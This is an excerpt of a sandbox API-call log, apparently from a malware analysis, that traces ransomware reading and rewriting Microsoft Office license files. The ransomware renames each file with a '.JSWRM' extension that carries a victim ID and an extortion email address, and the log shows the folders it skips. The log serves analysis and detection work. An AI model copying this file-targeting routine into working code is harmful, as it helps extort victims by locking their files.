Office\\root\\Licenses16\\MondoR_Trial-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_trial-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Trial-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_trial-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0104.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0104.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0104.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0104.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0104.254] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe53d491f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe53d491f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe55520ee, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x67d9, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_Trial-ppd.xrm-ms", cAlternateFileName="MO25B8~1.XRM")) returned 1 [0104.254] lstrcmpiW (lpString1="MondoR_Trial-ppd.xrm-ms", lpString2=".") returned 1 [0104.254] lstrcmpiW (lpString1="MondoR_Trial-ppd.xrm-ms", lpString2="..") returned 1 [0104.254] lstrcmpiW (lpString1="MondoR_Trial-ppd.xrm-ms", lpString2="...") returned 1 [0104.254] lstrcmpiW (lpString1="MondoR_Trial-ppd.xrm-ms", lpString2="windows") returned -1 [0104.254] lstrcmpiW (lpString1="MondoR_Trial-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.254] lstrcmpiW (lpString1="MondoR_Trial-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.254] lstrcmpiW (lpString1="MondoR_Trial-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.254] lstrcmpiW (lpString1="MondoR_Trial-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.254] lstrcmpiW (lpString1="MondoR_Trial-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.254] lstrcmpiW (lpString1="MondoR_Trial-ppd.xrm-ms", lpString2="msocache") returned -1 [0104.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Trial-ppd.xrm-ms", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0104.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0104.254] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Trial-ppd.xrm-ms", cchWideChar=23, lpMultiByteStr=0x2410d8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 23 [0104.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Trial-ppd.xrm-ms", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0104.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0104.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Trial-ppd.xrm-ms", cchWideChar=23, lpMultiByteStr=0x240f48, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Trial-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 23 [0104.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0104.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0104.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.255] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0104.255] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_trial-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.255] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=26585) returned 1 [0104.255] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.255] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x67d0) returned 0x24c1d0 [0104.255] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x67d0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x67d0, lpOverlapped=0x0) returned 1 [0104.258] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.258] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x67d0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x67d0, lpOverlapped=0x0) returned 1 [0104.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.259] CloseHandle (hObject=0x45c) returned 1 [0104.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0104.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0104.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0104.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0104.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0104.259] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0104.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0104.259] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0104.259] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Trial-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_trial-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Trial-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_trial-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0104.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0104.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0104.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0104.260] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0104.260] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe53ae71a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe53ae71a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe546d2b6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d42, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_Trial-ul-oob.xrm-ms", cAlternateFileName="MOE202~1.XRM")) returned 1 [0104.260] lstrcmpiW (lpString1="MondoR_Trial-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.260] lstrcmpiW (lpString1="MondoR_Trial-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.260] lstrcmpiW (lpString1="MondoR_Trial-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.260] lstrcmpiW (lpString1="MondoR_Trial-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.260] lstrcmpiW (lpString1="MondoR_Trial-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.260] lstrcmpiW (lpString1="MondoR_Trial-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.260] lstrcmpiW (lpString1="MondoR_Trial-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.260] lstrcmpiW (lpString1="MondoR_Trial-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.260] lstrcmpiW (lpString1="MondoR_Trial-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.260] lstrcmpiW (lpString1="MondoR_Trial-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0104.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0104.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Trial-ul-oob.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0104.260] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0104.260] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Trial-ul-oob.xrm-ms", cchWideChar=26, lpMultiByteStr=0x241128, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0104.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0104.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0104.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Trial-ul-oob.xrm-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0104.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0104.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Trial-ul-oob.xrm-ms", cchWideChar=26, lpMultiByteStr=0x2412b8, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Trial-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 26 [0104.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0104.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0104.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0104.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.261] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0104.261] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_trial-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.261] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11586) returned 1 [0104.261] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24c1d0 [0104.261] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d40, lpOverlapped=0x0) returned 1 [0104.263] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.263] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d40, lpOverlapped=0x0) returned 1 [0104.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.264] CloseHandle (hObject=0x45c) returned 1 [0104.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0104.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0104.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0104.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0104.264] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e688 [0104.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0104.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.264] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Trial-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_trial-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Trial-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_trial-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e688 | out: hHeap=0x1e0000) returned 1 [0104.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0104.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0104.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0104.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0104.265] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe50d9a48, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe50d9a48, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe53884b9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x30bf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoVL_KMS_Client-ppd.xrm-ms", cAlternateFileName="MONDOV~1.XRM")) returned 1 [0104.265] lstrcmpiW (lpString1="MondoVL_KMS_Client-ppd.xrm-ms", lpString2=".") returned 1 [0104.265] lstrcmpiW (lpString1="MondoVL_KMS_Client-ppd.xrm-ms", lpString2="..") returned 1 [0104.265] lstrcmpiW (lpString1="MondoVL_KMS_Client-ppd.xrm-ms", lpString2="...") returned 1 [0104.265] lstrcmpiW (lpString1="MondoVL_KMS_Client-ppd.xrm-ms", lpString2="windows") returned -1 [0104.265] lstrcmpiW (lpString1="MondoVL_KMS_Client-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.265] lstrcmpiW (lpString1="MondoVL_KMS_Client-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.265] lstrcmpiW (lpString1="MondoVL_KMS_Client-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.265] lstrcmpiW (lpString1="MondoVL_KMS_Client-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.265] lstrcmpiW (lpString1="MondoVL_KMS_Client-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.265] lstrcmpiW (lpString1="MondoVL_KMS_Client-ppd.xrm-ms", lpString2="msocache") returned -1 [0104.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0104.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_KMS_Client-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0104.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0104.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_KMS_Client-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x241290, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0104.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0104.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0104.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_KMS_Client-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0104.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0104.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoVL_KMS_Client-ppd.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2412b8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoVL_KMS_Client-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0104.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0104.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0104.266] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0104.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.266] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0104.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoVL_KMS_Client-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondovl_kms_client-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.266] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=12479) returned 1 [0104.266] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.266] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30b0) returned 0x24c1d0 [0104.266] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x30b0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x30b0, lpOverlapped=0x0) returned 1 [0104.269] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.269] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x30b0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x30b0, lpOverlapped=0x0) returned 1 [0104.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.269] CloseHandle (hObject=0x45c) returned 1 [0104.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0104.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0104.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.270] HeapFree (in: hHeap=0x1e0000, 